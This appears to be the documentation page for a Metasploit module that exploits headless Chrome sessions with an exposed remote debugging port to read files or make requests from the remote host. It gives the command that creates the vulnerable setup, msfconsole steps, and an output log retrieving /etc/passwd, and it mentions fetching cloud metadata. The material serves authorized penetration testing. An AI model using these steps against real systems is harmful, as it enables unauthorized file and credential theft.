1.3 KiB
1.3 KiB
Vulnerable Application
This module takes advantage of misconfigured headless chrome sessions and either retrieves a specified file off the remote file system, or makes a web request from the remote machine.
This can be useful for retrieving cloud metadata in certain scenarios. Primarily this module targets developers.
A vulnerable Headless Chrome session can be started with the following command:
$ google-chrome --remote-debugging-port=9222 --headless --remote-debugging-address=0.0.0.0
This will start a webserver running on port 9222 for all network interfaces.
Verification Steps
- Start
msfconsole
- Execute
auxiliary/gather/chrome_debugger
- Execute
set RHOST $REMOTE_ADDRESS
- Execute
set RPORT 9222
- Execute either
set FILEPATH $FILE_PATH_ON_REMOTE
orset URL $URL_FROM_REMOTE
- Execute
run
Options
FILEPATH
The file path on the remote you wish to retrieve.
URL
A URL you wish to fetch the contents of from the remote machine.
Note: One or the other must be set!
Scenarios
[*] Attempting Connection to ws://192.168.20.168:9222/devtools/page/CF551031373306B35F961C6C0968DAEC
[*] Opened connection
[*] Attempting to load url file:///etc/passwd
[*] Received Data
[*] Sending request for data
[*] Received Data
[+] Retrieved resource
[*] Auxiliary module execution completed